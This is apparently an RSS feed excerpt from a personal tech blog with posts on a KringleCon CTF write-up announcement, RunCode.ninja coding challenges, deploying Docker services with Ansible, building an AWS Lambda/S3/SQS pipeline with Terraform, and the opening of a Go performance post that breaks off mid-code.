&lt;p>In this post I discussed a relatively complex project with lots of exciting technology working together in the realm of Cloud Computing. In the end, I was able to create DashBoards and Monitors in DataDog, which can ingest and display telemetry about AWS workloads, in a way that makes it useful to track and monitor the workloads themselves.&lt;/p></description></item><item><title>KringleCon II</title><link>https://flrnks.netlify.app/post/kringlecon-writeup/</link><pubDate>Mon, 13 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/kringlecon-writeup/</guid><description>&lt;p>In this post I just wanted to announce and link to my write-up in the Tutorials section of my blog, which chronicles my solution to the challenges of the most fun CTF of the holiday season.&lt;/p>
&lt;p>&lt;img src="sans-main.png" alt="HHC 2019">&lt;/p>
&lt;p>A huge thank you goes out to the SANS Institute and the Counter Hack Team who are the organisers of this event. They put a great deal of energy and effort year after year to host this event. It is no wonder the campus of the Elf University was sometimes so crowded, you could barely see your own avatar! :)&lt;/p>
&lt;p>&lt;img src="crowd.png" alt="Crowds at Elf University">&lt;/p>
&lt;p>To get to the write-up, either click
&lt;a href="https://flrnks.netlify.app/tutorials/kringlecon2019/">this&lt;/a> link, or manually go to the Tutorials section in the top bar. I also welcome any kind of feedback or comment on the write-up, to do so please hit the Contact link in the top bar.&lt;/p></description></item><item><title>RunCode.ninja Challenges</title><link>https://flrnks.netlify.app/post/runcode/</link><pubDate>Sat, 11 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/runcode/</guid><description>&lt;p>This post was born on a misty saturday morning, while slowly sipping some good quality coffe in a Prague café. The last several days after work was over I spent solving programming challenges on
&lt;a href="https://runcode.ninja/" target="_blank" rel="noopener">runcode.ninja&lt;/a> and I thought it would be nice to share my experience and spread the word about it.&lt;/p>
&lt;h3 id="runcodeninja">RunCode.ninja&lt;/h3>
&lt;p>I can&amp;rsquo;t really recall how I discovered this website in the first place&amp;hellip; All I remember is that I was really into the simplistic idea of it all. The basic idea for most of the challenges goes something like this:&lt;/p>
&lt;ul>
&lt;li>check problem description&lt;/li>
&lt;li>inspect any sample input (if any)&lt;/li>
&lt;li>write your program locally&lt;/li>
&lt;li>test on sample input (if any)&lt;/li>
&lt;li>submit source code to the evaluation platform&lt;/li>
&lt;/ul>
&lt;p>If all went well, you will get feedback within a few seconds whether the submitted code worked correctly for the given task at hand. If it didn&amp;rsquo;t, then you can turn to their
&lt;a href="https://runcode.ninja/faq" target="_blank" rel="noopener">FAQ&lt;/a> for some advice. It definitely has some useful info, however if all else fails, you can also contact the team behind the platform on their slack
&lt;a href="runcodeslack.slack.com">channel&lt;/a>. They are really friendly people so be sure to respond to their effort in kind!&lt;/p>
&lt;p>&lt;img src="runcode.png" alt="easy-category">&lt;/p>
&lt;p>Another nice thing about their platform is that they categorized all their challenges (119 in total as of now) into nice categories such as &lt;code>binary, encoding, encryption, forensics, etc.&lt;/code> which allows you to select what you are interested in. When I started out, I was first aiming to complete the challenges in &lt;code>Easy&lt;/code> which offers a combination of relatively easy challenges from &lt;code>math, text-parsing, encoding&lt;/code> and other categories.&lt;/p>
&lt;p>As it currently stands, I rank 155 our of around ~2400 registered users, which seems quite impressive at first, but I suspect there may be quite a few inactive accounts in their database. Also, there are some hardcore people who have already completed all their challenges that seems quite impressive. If only a few rainy and cold weekends I could spend working on these, I would probably catch up soon!&lt;/p>
&lt;p>Last but not least, their platform is set up to interpret a several different programming languages, so you can choose to solve them in the language you are most comfortable with. Once you solve a challenge, you can access its &lt;code>write-ups&lt;/code> which provide some very useful inspiration on how others have solved the same problem. This can provide some very valuable lessons, like that one time when I wrote a Go program that was 20 lines long to solve a challenge that took only 1 line into solve in Bash&amp;hellip;&lt;/p>
&lt;p>If you are interested to check out my solutions for some of the challenges, you can find them in my GitHub
&lt;a href="https://github.com/florianakos/codewarz" target="_blank" rel="noopener">repository&lt;/a>. For some of them I even created two different solutions, one in Python and another Go, just to compare and practice working with both languages.&lt;/p>
&lt;p>Oh and I almost forgot to mention, they have some really cool stickers that they are not shy to send half-way across the world by post, so that&amp;rsquo;s another big plus for sticker fans :)&lt;/p>
&lt;p>&lt;img src="sticker.png" alt="sticket">&lt;/p>
&lt;p>That&amp;rsquo;s all for now, thank you for tuning in! :)&lt;/p></description></item><item><title>Docker with Ansible</title><link>https://flrnks.netlify.app/post/ansible-docker/</link><pubDate>Fri, 13 Dec 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/ansible-docker/</guid><description>&lt;h2 id="introduction">Introduction&lt;/h2>
&lt;p>This post was written as a kind of learning diary for my most recent venture into the world of automation through &lt;code>Ansible&lt;/code>. The project I implemented uses Docker to package 2 services into a micro-services architecture and Ansible to build and deploy those services on remote hosts (with the help of Dockr Compose).&lt;/p>
&lt;h3 id="the-idea">The Idea&lt;/h3>
&lt;p>The service implements a file processing utility which monitors the file-system (a particular folder) and grabs any newly created files and stores them in another folder while compressing it. Interacting with the service is possible through a web interface which offers a way to upload files, simple statistics and the possibility to request email summaries.&lt;/p>
&lt;h3 id="the-approach">The Approach&lt;/h3>
&lt;p>The first idea was to write it all in Go, because I am quite comfortable with the language. However, after a few searches on the interweb, I discovered that a handy UNIX utility already exists for my exat use-case: &lt;code>inotify&lt;/code>. While Go has some packages that offer wrappers around this utility, I eventually decided to just write a bash script for using the &lt;code>inotify&lt;/code> tool, instead of relying on Go for implementing all parts of this service. This also allowed me a convenient excuse to make the service into a 2 piece set, both of which can be deployed and scaled independently, in the spirit of micro-service architecture. Next, I set out to learn enough of Ansible that can be used to deploy a packaged in Docker containers.&lt;/p>
&lt;h2 id="ansible-101">ANSIBLE 101&lt;/h2>
&lt;p>Before this project, I never had the chance to use Ansible, but I wanted to learn about it for quite a while, so here I would describe it briefly for those who are also on the start of their journey with Ansible.&lt;/p>
&lt;p>At the basic level, it is a tool for provisioning and configuring applications on remote systems in an automated fashion. To achieve the automation it uses so-called &lt;code>playbooks&lt;/code>, which define what steps are necessary to reach a desired state for remote systems. It runs mainly on UNIX systems, but is able to provision and configure both UNIX and Windows based systems.&lt;/p>
&lt;p>It is an &lt;code>agentless&lt;/code> tool, which means it does not require any special software to be included in the remote hosts. Instead it relies on an SSH connection to remote hosts, through which bash or PowerShell utilities are used to carry out the necessary steps.&lt;/p>
&lt;p>Ansible uses an &lt;code>inventory&lt;/code> that describes the remote systems that can be provisioned through the playbooks. Inventories can be defined statically in local filesystem on the Ansible master node, or pulled dynamically from remote systems as well.&lt;/p>
&lt;h2 id="ansible-meets-docker">ANSIBLE MEETS DOCKER&lt;/h2>
&lt;p>For the purpose of this project, them main use of Ansible lies in its ability to build and run Docker containers. While Docker is not strictly needed to deploy this service on multiple remote hosts, it becomes much easier when all the necessary dependencies and the source code are packaged neatly in a container that can be easily shipped. Within the Docker container, all dependencies are set up and the service is configured in a reliable and consistent manner, while Ansible takes care of deploying and running the service.&lt;/p>
&lt;p>It is worth mentioning that other tools exist, such as Kubernetes, Docker Swarm and others, which focus more on shipping containerised applications. This blog post, however will not deal with those, but focus entirely on Ansible and Docker instead. Future posts may discuss those alternatives in more detail.&lt;/p>
&lt;p>Below is a brief summary of the proposed architecture that depicts how Ansible and Docker are used together to achieve the desired state of deploying the containerised service on each Ansible host.&lt;/p>
&lt;p>&lt;img src="ansib-meets-dock.png" alt="Ansible meets Docker">&lt;/p>
&lt;p>Detailed instructions are out of scope for this post as well, but briefly: the above shows a snapshot of my local environment using virtual machines in VirtualBox. First, I created a master VM with Ubuntu Desktop and then two slave VMs with Ubuntu server (no GUI necessary). Ansible was installed on the Master node and proper SSH access was configured for both slave VMs from the master VM. In the Ansible playbook used to deploy the service on remote systems, the first few tasks were about installing necessary dependencies and setting up a local docker environment, which can later build and run containerised applications.&lt;/p>
&lt;h2 id="monolithic-vs-microservice">MONOLITHIC VS MICROSERVICE&lt;/h2>
&lt;p>Before discussing how Ansible was used to deploy the service on remote machines using Docker, it is worth going through the building blocks of the service itself. The set of features needed for the service:&lt;/p>
&lt;ul>
&lt;li>file monitoring service that grabs and compresses files&lt;/li>
&lt;li>web interface for file uploads, email sending and service stats&lt;/li>
&lt;/ul>
&lt;p>These features could be implemented in one application that runs all the necessary functions in parallel. In fact, on my first iteration, I opted to solve it this way, packaging all features into a single container. The below figure shows how it worked.&lt;/p>
&lt;p>&lt;img src="monolithic.png" alt="Monolithic Docker">&lt;/p>
&lt;p>However, for the sake of learning, it is worth to consider using a &lt;code>microservice&lt;/code> approach. This essentially means breaking up big &lt;code>monolithic&lt;/code> applications to smaller sub-components. Docker is a perfect tool for this. For our purposes, such an architecture could mean deploying 2 separate containers: one for the Web UI backend (for uploads, statistics and email) and another that implements the monitoring and compression service. Below is an updated figure showing the breakup of our previously monolithic approach.&lt;/p>
&lt;p>&lt;img src="microservice.png" alt="Microservice Docker">&lt;/p>
&lt;p>Breaking up the one container from the first iteration into two separate containers enables us to reap some benefits of microservice architecture. Our application components can fail independently, for example, a bug in the email sending service will not bring down the monitoring service. Also, such an architecture means in the future we can scale better with demand, in case there would be a huge surge in requests to the web frontend, we could just deploy more instances of the container and use a load-balancer to distribute requests among those instances.&lt;/p>
&lt;h2 id="implementation">IMPLEMENTATION&lt;/h2>
&lt;p>To implement the web component, I used simmple static HTML being served from a &lt;code>GO&lt;/code> backend, that also handled file-uploads, sending email notifications and extracting statistical data from a shared SQLite3 database. In order to implement the file monitoring service, I used the &lt;code>inofity-tools&lt;/code> available on UNIX systems, and wrapped it in a bash script that took care of the zipping, and generating of logs and statistics into the SQLite3 database.&lt;/p>
&lt;h3 id="docker-compose">Docker-Compose&lt;/h3>
&lt;p>Docker Compose was used to enable easier testing and deployment. The definitions in the &lt;code>docker-compose.yml&lt;/code> describe what docker containers should be started with what parameters. The two services defined in the docker-compose correspond to the two containers defined above using the micro-service architecture.&lt;/p>
&lt;p>The &lt;code>webserver&lt;/code> running the GO backend uses a few mounted folders plus an exposed port to let inbound communication reach the server. The &lt;code>monitor&lt;/code> uses 4 folders mounted from the host FS, which enable its core functionality (listening for files and zipping them to a different folder).&lt;/p>
&lt;h3 id="ansible">Ansible&lt;/h3>
&lt;p>Thanks to Docker Compose, it was relatively simple to deploy and run the service with Ansible, once the necessary packages and dependencies are installed on Ansible hosts. All it took was a simple Ansible Task using the docker_compose module:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">- &lt;span class="k">name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Docker-Compose&lt;span class="w"> &lt;/span>UP&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">docker_compose&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">project_src&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>path_to_docker_compose_yml&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">build&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>yes&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>While testing the sevice a few issues were discovered that could be considered as bugs, but instead let&amp;rsquo;s call them features!&lt;/p>
&lt;h3 id="feature-1">Feature #1&lt;/h3>
&lt;p>Since the service lets users upload files, sometimes, if the file is large enough, the processing may kick in faster than the upload can be completed. In this case, the file may be corrupted and would not be possible to recover after unzipping. To mitigae this to a certain extent, a 5 second processing delay has been added to the &lt;code>monitor_service.sh&lt;/code> script, which will, as a result, delay the processing and hope that during those 5 seconds, the upload has finished.&lt;/p>
&lt;h3 id="feature-2">Feature #2&lt;/h3>
&lt;p>While creating the two Docker files describing each component of the service, I wanted to take an extra step and created a non-root user, so that the main process of the service starts as some user which does not have full root access to everything. This worked well while developing and testing on a local system using manual execution via &lt;code>docker-compose up/down&lt;/code> commands. However, once Ansible has been updated to use DC via the &lt;code>docker_compose&lt;/code> module, certain functionalities would be broken due to file/folder permission issues. Basically the mounted folders would belong to root, whereas the running process was non-root, so it could not save uploaded files for example. Further investigations will be done to solve this, until then, the Dockerfiles have been reverted to use root when starting the main processes.&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>All in all, working on this project has been a great opportunity to practice such tools as Docker, Docker Compose and Ansible. While I have used Docker briefly before, I have never once used Ansible, and I learnt a great deal about it during this project. I can definitely see how it enables large organisations to streamline their processes when it comes to deploying and configuring various systems and services in their infrastructure. While this project is rather rudimentary, it gave me a good entry to this realm of IT.&lt;/p></description></item><item><title>Infrastructure as Code</title><link>https://flrnks.netlify.app/post/infra-as-code/</link><pubDate>Tue, 12 Nov 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/infra-as-code/</guid><description>&lt;h2 id="introduction">Introduction&lt;/h2>
&lt;p>In this post I will briefly introduce different AWS services and show how to use Terraform to orchestrate and manage them. While the concept of the whole service is rather simple, its main use is enabling me to learn about this new emerging technology called Infrastructure-as-Code or IaC for short.&lt;/p>
&lt;h2 id="project-overview">Project overview&lt;/h2>
&lt;p>The main goal of this task is to deploy a server-less function and periodically query the Github API to get a list of public repositories for a given organisation (e.g.: Google). The retrieved information should then be stored in a compressed CSV file in a specific S3 bucket, while notifications should be created for new files saved to the bucket.&lt;/p>
&lt;p>&lt;img src="arch.png" alt="Go concurrency implemented">&lt;/p>
&lt;p>The main AWS components of the solution are:&lt;/p>
&lt;ul>
&lt;li>Lambda function written in Python&lt;/li>
&lt;li>CW Event Rule to schedule the Lambda periodically&lt;/li>
&lt;li>S3 for storing data in a bucket&lt;/li>
&lt;li>SQS for queueing notifications from S3&lt;/li>
&lt;/ul>
&lt;h2 id="possibilities">Possibilities&lt;/h2>
&lt;p>Various methods exist for the creation and configuration of these necessary resources. The most simple one is by logging in to the AWS Management Console and setting up each components one by one via the GUI. This method, however, is slow, cumbersome and quite prone to errors.&lt;/p>
&lt;p>A better option can be to use the
&lt;a href="https://aws.amazon.com/tools/" target="_blank" rel="noopener">AWS SDK&lt;/a> for your favourite programming language. Several options exist, such as Java, Python, GO, Node.js, etc&amp;hellip; This option is less error-prone, but still quite cumbersome and slow.&lt;/p>
&lt;p>Perhaps one of the best options is to use Terraform, which is a popular Infrastructure as Code or IaC tool these days. It lets you define your infrastructure in a configuration language and has its own internal engine that talks to the AWS SDK to create the necessary infrastructure you defined.&lt;/p>
&lt;h2 id="setup-procedure">Setup procedure&lt;/h2>
&lt;p>Before we can make use of Terraform to deploy our project on AWS, we need to set up credentials. This can be done by logging in to the AWS management console and going to Identity and Access Management section, which can provide the necessarz Access Key and Secret value that you need to put into a file on disk. These credentials should be saved to &lt;code>~/.aws/credentials&lt;/code> as follows:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="o">[&lt;/span>default&lt;span class="o">]&lt;/span>
&lt;span class="nv">aws_access_key_id&lt;/span> &lt;span class="o">=&lt;/span> XXXXXXXXXXXX
&lt;span class="nv">aws_secret_access_key&lt;/span> &lt;span class="o">=&lt;/span> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This enables Terraform to make changes to your AWS infrastructure through API calls made to AWS to provision resources according to your definition in the .tf file. Once you create the desired configuration a complete infrastructure can be deployed as simply as below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">$ ▶ ls -la
-rw-r--r-- &lt;span class="m">1&lt;/span> user group 4.9K Nov &lt;span class="m">21&lt;/span> 22:58 main.tf
$ ▶ terraform init
...
Terraform has been successfully initialized!
$ ▶ terraform apply
...
Plan: &lt;span class="m">13&lt;/span> to add, &lt;span class="m">0&lt;/span> to change, &lt;span class="m">2&lt;/span> to destroy.
Do you want to perform these actions?
Enter a value: YES
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="project-building-blocks">Project building blocks&lt;/h2>
&lt;p>In this section I will go over each major component and explain what it is, what it does and how it is set up. First up is the main component: the core logic implemented in Python.&lt;/p>
&lt;h3 id="aws-simple-storage-service">AWS Simple Storage Service&lt;/h3>
&lt;p>This is a basic building block which we use to store data generated by the Lambda function. Since Lambdas are by nature server-less, they do not have persistent storage attached which can be used to save data between two invocations of the function. If we need persistent storage we need to use S3. The necessary Terraform code is below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_s3_bucket&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;tf_aws_bucket&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">bucket&lt;/span> = &lt;span class="s2">&amp;#34;tf-aws-bucket&amp;#34;&lt;/span>
&lt;span class="na">tags&lt;/span> = &lt;span class="p">{&lt;/span>
&lt;span class="na">Name&lt;/span> = &lt;span class="s2">&amp;#34;Bucket for Terraform project&amp;#34;&lt;/span>
&lt;span class="na">Environment&lt;/span> = &lt;span class="s2">&amp;#34;Dev&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="na">force_destroy&lt;/span> = &lt;span class="s2">&amp;#34;true&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This will create a bucket named &lt;code>tf-aws-bucket&lt;/code> which we can then use to store the results of our Lambda function. As an extra feature, we also configured notifications for this bucket, which will be created when a compressed file with &lt;code>.gz&lt;/code> file type is created in the bucket. When this happens a notification will be generated and sent to the SQS queue that is also defined in the same Terraform file.&lt;/p>
&lt;h3 id="aws-lambda">AWS Lambda&lt;/h3>
&lt;p>AWS Lambda is a server-less technology which lets you create a bare function in the cloud and call it from various other services, without having to worry about setting up an environment where it will run. Different programming language are supported, such as Python, Java, Go and NodeJS. Once you deploy your code, you can receive input to your function just as normally when you write a function, and give it permission to access and modify other resources in AWS, such as working with files stored in S3.&lt;/p>
&lt;p>This is exactly the use-case that was implemented in this project. A lambda function that makes an API call to Github to download information, then store this in a compressed CSV file to an S3 bucket. To define the target organisation and the bucket where information is saved, the Lambda function expects two arguments in the function call:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-json" data-lang="json">&lt;span class="p">{&lt;/span>
&lt;span class="nt">&amp;#34;org_name&amp;#34;&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;twitter&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;target_bucket&amp;#34;&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;repos_folder&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This JSON input passed to the function is converted to a map in Python, which can be tested for the presence of necessary keys for the correct functioning of the code:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="k">def&lt;/span> &lt;span class="nf">handler&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">event&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">context&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="c1"># verify that URL is passed correctly and create file_name variable based on it&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="s1">&amp;#39;org_name&amp;#39;&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">event&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">keys&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s1">&amp;#39;target_bucket&amp;#39;&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">event&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">keys&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Missing &amp;#39;org_name&amp;#39; from request body (JSON)!&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The rest of the function&amp;rsquo;s code downloads the list of public repositories of the passed organisation from Github API and store this in a temporary file that can be uploaded to S3, provided that the necessary permissions have been granted to this Lambda function:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">boto3&lt;/span>
&lt;span class="n">s3&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">boto3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;s3&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">s3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">upload_file&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">path_to_local_file&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">target_bucket_name&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">key_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to enable access to S3 from Lambda, we have to define some IAM policies and roles. First we have to define a policy which says that the role, which obtains this policy can access the S3 bucket:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">data&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">statement&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">effect&lt;/span> = &lt;span class="s2">&amp;#34;Allow&amp;#34;&lt;/span>
&lt;span class="na">resources&lt;/span> = &lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;arn:aws:s3:::tf-aws-bucket/*&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="na">actions&lt;/span> = &lt;span class="p">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:GetObject&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="s2">&amp;#34;s3:PutObject&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="s2">&amp;#34;s3:ListBucket&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="p">]&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kr">
&lt;/span>&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_policy&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">name&lt;/span> = &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span>
&lt;span class="na">policy&lt;/span> = &lt;span class="nb">data&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">aws_iam_policy_document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">s3_lambda_access&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">json&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This policy is then attached to an IAM role which is allowed to be assumed by AWS Lambda:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_role_policy_attachment&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">role&lt;/span> = &lt;span class="nx">aws_iam_role&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tf_aws_exercise_role&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">name&lt;/span>
&lt;span class="na">policy_arn&lt;/span> = &lt;span class="nx">aws_iam_policy&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">s3_lambda_access&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">id&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kr">
&lt;/span>&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_role&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;tf_aws_exercise_role&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">name&lt;/span> = &lt;span class="s2">&amp;#34;tfExerciseRole&amp;#34;&lt;/span>
&lt;span class="na">description&lt;/span> = &lt;span class="s2">&amp;#34;Role that allowed to be assumed by AWS Lambda, which will be taking all actions.&amp;#34;&lt;/span>
&lt;span class="na">tags&lt;/span> = &lt;span class="p">{&lt;/span>
&lt;span class="na">owner&lt;/span> = &lt;span class="s2">&amp;#34;tfExerciseBoss&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="na">assume_role_policy&lt;/span> = &lt;span class="o">&amp;lt;&amp;lt;EOF&lt;/span>&lt;span class="s">
&lt;/span>&lt;span class="s">{
&lt;/span>&lt;span class="s"> &amp;#34;Version&amp;#34;: &amp;#34;2012-10-17&amp;#34;,
&lt;/span>&lt;span class="s"> &amp;#34;Statement&amp;#34;: [
&lt;/span>&lt;span class="s"> {
&lt;/span>&lt;span class="s"> &amp;#34;Action&amp;#34;: &amp;#34;sts:AssumeRole&amp;#34;,
&lt;/span>&lt;span class="s"> &amp;#34;Principal&amp;#34;: {
&lt;/span>&lt;span class="s"> &amp;#34;Service&amp;#34;: &amp;#34;lambda.amazonaws.com&amp;#34;
&lt;/span>&lt;span class="s"> },
&lt;/span>&lt;span class="s"> &amp;#34;Effect&amp;#34;: &amp;#34;Allow&amp;#34;
&lt;/span>&lt;span class="s"> }
&lt;/span>&lt;span class="s"> ]
&lt;/span>&lt;span class="s">}
&lt;/span>&lt;span class="s">&lt;/span>&lt;span class="o">EOF&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="aws-cloudwatch-events">AWS CloudWatch Events&lt;/h3>
&lt;p>This component is responsible for periodically making a call to our Lambda function, with the required arguments passed in JSON format. This component was also configured via Terraform, but for the sake of simplicity, below is a screenshot taken from the AWS Management Console where the created CW event shows up as configured:&lt;/p>
&lt;p>&lt;img src="cwe.png" alt="Cloudwatch Events Rule">&lt;/p>
&lt;p>The screen-shot shows that it is configured to periodically execute a Target Lambda function every 2 minutes.&lt;/p>
&lt;h3 id="results">Results&lt;/h3>
&lt;p>In summary, it took me a while to get the hang of Infrastructure as Code concept and apply it while working with Terraform on AWS, but I can definitely see how it can benefit a bigger organisation which want their Cloud infrastructure to be stable and maintainable. IaC tools such as Terraform let developers define their infrastructure as code and check it in to version control for repeatable and more predictable deployment procedures. Now that I have this working project, I can do a simple &lt;code>terraform deploy&lt;/code> to bring alive my service with all required components and permissions correctly set up in seconds, while also being able to quickly destroy it if I chose to do so. This gives flexibility and greater ease of development that can speed up projects in the cloud.&lt;/p></description></item><item><title>Performance tuning GO</title><link>https://flrnks.netlify.app/post/go-performance/</link><pubDate>Mon, 11 Nov 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/go-performance/</guid><description>&lt;h3 id="introduction">Introduction&lt;/h3>
&lt;p>This post is going to contain a short story on how I managed to optimize the execution of a simple program, written for a coding challenge on the site &lt;code>runcode.ninja&lt;/code>.&lt;/p>
&lt;p>Short description of the task:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">There is a text file which is given as argument to your program.This text
file contains lines, each of which is an encoded englishword. Recover them
and print them out to the standard output lineby line. Hint: the UNIX
built-in dictionary may come in handy at &lt;span class="s2">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To attack problem, I used the GO language to write a program which used the built-in &lt;code>encoding&lt;/code> and &lt;code>os/exec&lt;/code> packages to decode the lines and to call grep to search in the file-based dictionary. It was not very difficult to figure out that the encoding in use was base64.&lt;/p>
&lt;p>However, to make each line valid either a single &lt;code>=&lt;/code> or double equation &lt;code>==&lt;/code> characters had to be added to each line. The below code takes care of this addition of extra characters at the end of each line.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">func&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="kt">string&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">decoded&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">base64&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">StdEncoding&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">DecodeString&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="kc">nil&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">encodedStr&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="s">&amp;#34;=&amp;#34;&lt;/span>
